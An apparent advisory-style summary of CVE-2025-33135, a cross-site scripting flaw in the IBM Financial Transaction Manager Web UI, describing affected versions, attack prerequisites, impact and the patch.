CVE-2025-33135

Vulnerability

Overview

IBM Financial Transaction Manager (FTM) for ACH Services and Check Services for Multi-Platform versions 3.0.0.0 through 3.0.5.4 Interim Fix 027 contain a cross-site scripting (XSS) vulnerability in the Web UI. This flaw stems from improper neutralization of user-controlled input during web page generation, enabling an attacker to inject arbitrary JavaScript code into the application's interface. The root cause is insufficient input validation or encoding of untrusted data before rendering it to users.

Attack

Surface and Prerequisites

An unauthenticated remote attacker can exploit this vulnerability without needing prior access to the system. The attack vector is network-based and requires no special privileges or user interaction beyond a victim visiting a crafted link or page within the affected Web UI. The vulnerability likely exists in a component where user-supplied data is reflected or stored and later displayed without sanitization, such as in error messages, transaction details, or configuration pages.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser session within the trusted FTM domain. This can lead to credential disclosure, session hijacking, or unauthorized actions performed on behalf of the victim. The CVSS v3 base score of 6.1 (Medium) reflects the potential for confidentiality impact on confidentiality and integrity but with low attack complexity and no authentication requirements [1].

Mitigation

Status

IBM has published a security advisory (reference [1]) that includes instructions for applying Interim Fix 027 or later versions to remediate this issue. Users are advised to upgrade to a patched release as soon as possible. No workarounds are mentioned, and there is no indication that this CVE is listed in the CISA Known Exploited Vulnerabilities (KEV) catalog at the time of writing.